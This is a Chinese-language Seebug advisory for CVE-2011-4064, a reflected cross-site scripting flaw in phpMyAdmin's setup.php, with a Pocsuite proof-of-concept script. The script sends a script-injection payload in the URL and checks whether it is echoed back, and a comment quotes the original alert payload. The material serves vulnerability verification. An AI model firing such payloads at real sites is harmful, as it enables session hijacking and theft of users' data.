phpMyAdmin Setup接口跨站脚本漏洞

2011-10-1800:00:00

Root

www.seebug.org

EPSS

0.003

Percentile

69.3%

JSON

Bugtraq ID: 50175
CVE ID：CVE-2011-4064

phpMyAdmin是一款基于PHP的MySQL管理程序。
部分传递给setup.php的输入在返回用户之前缺少过滤，攻击者构建恶意链接，诱使用户解析，可导致恶意脚本在目标用户浏览器上执行，可获得目标用户敏感信息或劫持用户会话。
如果存在配置目录并可写，那么XSS负载可保存在此目录中。

phpMyAdmin 3.x
厂商解决方案
phpMyAdmin 3.4.6已经修复此漏洞，建议用户下载使用：
http://www.phpmyadmin.net/


                                                #!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import requests

'''
原始利用链接：
http://www.example.com/phpMyAdmin-2.11.1/scripts/setup.php?>'"><script>alert('xss');</script>

借鉴wvs使用prompt替代alert一定程度绕过限制，并使用特殊字段进行匹配：
<script>prompt("SEBUG@TEST");</script>

'''

class TestPOC(POCBase):
    vulID = '23110'  # ssvid
    version = '1.0'
    author = ['XXXXX']
    vulDate = ''
    createDate = '2016-01-01'
    updateDate = '2016-01-01'
    references = ['http://www.sebug.net/vuldb/ssvid-23110']
    name = 'phpMyAdmin Setup接口跨站脚本漏洞'
    appPowerLink = 'http://www.phpmyadmin.net/'
    appName = 'phpMyAdmin'
    appVersion = ''
    vulType = 'XSS'
    desc = '''
    '''
    samples = ['']
    
    def _verify(self):
        result = {}

        vulurl = self.url + "/phpMyAdmin-2.11.1/scripts/setup.php?>'" + '"><script>prompt("SEBUG@TEST");</script>'

        resp = requests.get(vulurl)
        print resp.url
        
        if '<script>prompt("SEBUG@TEST");</script>' in resp.content:
            result['XSSInfo'] = {}
            result['XSSInfo']['URL'] = resp.url

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)

EPSS

0.003

Percentile

69.3%

JSON

Related for SSV:23110